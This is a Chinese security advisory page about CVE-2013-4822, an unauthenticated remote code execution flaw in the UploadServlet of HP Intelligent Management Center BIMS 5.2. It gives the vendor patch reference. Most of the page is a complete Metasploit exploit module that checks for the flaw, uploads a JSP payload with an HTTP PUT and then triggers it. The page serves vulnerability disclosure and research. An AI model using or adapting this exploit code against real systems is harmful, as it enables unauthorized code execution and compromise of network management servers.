首页 -> 安全研究
安全研究
安全漏洞
多款HP产品远程代码执行漏洞(CVE-2013-4822)
发布日期:2013-10-08
更新日期:2013-10-23
受影响系统:
HP Intelligent Management Center (IMC) 5.2描述:
BUGTRAQ ID: 62895
CVE(CAN) ID: CVE-2013-4822
惠普(HP)是面向个人用户、大中小型企业和研究机构的全球技术解决方案提供商。惠普(HP)提供的产品涵盖了IT基础设施,个人计算及接入设备,全球服务,面向个人消费者、大中小型企业的打印和成像等领域。
HP Intelligent Management Center (iMC), HP IMC Branch Intelligent Management System软件模块(BIMS), Comware路由器交换机等产品存在远程代码执行漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。此漏洞位于Branch Intelligent Management Module内的UploadServlet中。要访问该服务小程序无需身份验证,即可将文件写入到服务器中。
<*来源:Andrea Micalizzi aka rgod
链接:http://www.zerodayinitiative.com/advisories/ZDI-13-238/
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03943425
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Intelligent Management Center BIMS UploadServlet Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability on the version 5.2 of the BIMS
component from the HP Intelligent Management Center. The vulnerability exists in the
UploadServlet, allowing the user to download and upload arbitrary files. This module has
been tested successfully on HP Intelligent Management Center with BIMS 5.2 E0401 on Windows
2003 SP2.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-4822' ],
[ 'OSVDB', '98247' ],
[ 'BID', '62895' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-238/' ],
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03943425' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'HP Intelligent Management Center 5.1 E0202 - 5.2 E0401 / BIMS 5.1 E0201 - 5.2 E0401 / Windows', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 08 2013'))
register_options(
[
Opt::RPORT(8080)
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri("/", "upload", "upload"),
'method' => 'GET',
'vars_get' => { 'fileName' => "WEB-INF/web.xml" },
})
if res.nil?
print_error("Unable to determine, because the request timed out.")
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.headers['Content-Type'] =~ /application\/doc/ and res.body =~ /com\.h3c\.imc\.bims\.acs\.server\.UploadServlet/
return Exploit::CheckCode::Vulnerable
elsif res.code == 405 and res.message =~ /Method Not Allowed/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
# New lines are handled on the vuln app and payload is corrupted
#jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
print_status("#{peer} - Uploading the JSP payload...")
res = send_request_cgi({
'uri' => normalize_uri("/", "upload", "upload"),
'method' => 'PUT',
'vars_get' => { 'fileName' => jsp_name },
'data' => payload.encoded
})
if res and res.code == 200 and res.body.empty?
print_status("#{peer} - JSP payload uploaded successfully")
register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}")
else
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri("/", "upload", jsp_name),
'method' => 'GET'
}, 1)
end
end
建议:
厂商补丁:
HP
--
HP已经为此发布了一个安全公告(HPSBGN02929)以及相应补丁:
HPSBGN02929:HP Intelligent Management Center (iMC), HP IMC Branch Intelligent Management System Software Module (BIMS), and Comware Based Switches and Routers, Remote Code Execution, Disclosure of Information
链接:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03943425
浏览次数:2760
严重程度:0(网友投票)
绿盟科技给您安全的保障